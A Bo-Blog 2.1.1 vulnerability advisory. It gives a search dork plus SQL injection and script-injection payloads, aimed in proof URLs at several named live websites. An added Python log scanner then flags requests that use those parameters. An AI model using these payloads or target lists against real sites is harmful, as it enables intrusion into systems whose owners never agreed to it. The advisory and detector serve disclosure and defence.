Bo-Blog version 2.1.1 suffers from cross-site scripting and remote SQL injection vulnerabilities. Note that this finding houses site-specific data.
# Exploit Title : Bo-Blog 2.1.1 Multiple Vulnerabilities
#****************************************************************************
# Exploit Author : Ashiyane Digital Security Team
#************************************************
# Official site : http://www.bo-blog.com/
# Tested on: Windows,Linux
#*************************
#
#///////////////////////////////////////////////
# Google Dork : intext:"Powered by Bo-Blog 2.1.1"
#///////////////////////////////////////////////
#
# Exploit 1 : SQL Injection
#
# Location : /view.php?go=userlist&ordered=1[SQL Injection]
#
#
# Proof:
#
# http://www.landsaywilson.com//view.php?go=userlist&ordered=1%27
#
# http://itaoblog.com/view.php?go=userlist&ordered=1%27
#
# http://www.9enjoy.com/view.php?go=userlist&ordered=1%27
#
# http://www.hongcn.com/en/view.php?go=userlist&ordered=1%27
-----------------------------------------------------------------------------
# Exploit 2 : Cross-site scripting
#
# Location : /view.php?go=userlist&ordered=1&usergroup=[xss]
#
# Location : /blog//view.php?go=userlist&ordered=1&usergroup=[xss]
#
#
# Proof:
#
# http://itaoblog.com/view.php?go=userlist&ordered=1&usergroup=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
# www.landsaywilson.com//view.php?go=userlist&ordered=1&usergroup="/><script>alert(1);</script>
#
# http://www.boneboy.net/view.php?go=userlist&ordered=1&usergroup=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
# http://itlife365.com/view.php?go=userlist&ordered=1&usergroup=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
# http://www.hongcn.com/en/view.php?go=userlist&ordered=1&usergroup=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
##############--------
discovered by : ACC3SS
##############--------
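
Added example, not part of the original advisory: a log check for site operators that flags requests touching the two parameters reported above (`ordered` and `usergroup` on `view.php?go=userlist`). It assumes combined-format access logs and that legitimate `ordered` values are plain integers; the function names, finding codes and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Request line of a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
HTML_META = set("<>\"'")

def classify(log_line):
    """Return finding codes for one access-log line (empty list if clean)."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    # Split by hand: urlsplit() would read a leading "//view.php" as a host.
    path, _, query = m.group(1).partition("?")
    if not path.endswith("/view.php"):
        return []
    # parse_qs percent-decodes values, so %27 and %3C arrive as ' and <.
    params = parse_qs(query, keep_blank_values=True)
    if params.get("go") != ["userlist"]:
        return []
    findings = []
    # Assumption: a legitimate 'ordered' value is a plain decimal integer.
    if any(not re.fullmatch(r"[0-9]+", v) for v in params.get("ordered", [])):
        findings.append("sqli-ordered")
    if any(HTML_META & set(v) for v in params.get("usergroup", [])):
        findings.append("xss-usergroup")
    return findings

def scan(lines):
    """Map line index -> finding codes, for lines with at least one finding."""
    hits = {}
    for i, line in enumerate(lines):
        found = classify(line)
        if found:
            hits[i] = found
    return hits

# Constructed sample entries (documentation IP range, not real traffic).
PREFIX = '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET '
SAMPLE_LOG = [
    PREFIX + '/view.php?go=userlist&ordered=1 HTTP/1.1" 200 5120',
    PREFIX + '/view.php?go=userlist&ordered=1%27 HTTP/1.1" 200 812',
    PREFIX + '/blog//view.php?go=userlist&ordered=1&usergroup='
             '%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E HTTP/1.1" 200 5300',
    PREFIX + '/view.php?go=userlist&ordered=2&usergroup=3 HTTP/1.1" 200 5100',
    PREFIX + '/index.php?ordered=1%27 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for idx, found in scan(SAMPLE_LOG).items():
        print(idx, found)
```

A hit only shows that a request matched the reported pattern; whether the installation is affected still has to be confirmed against the deployed Bo-Blog version.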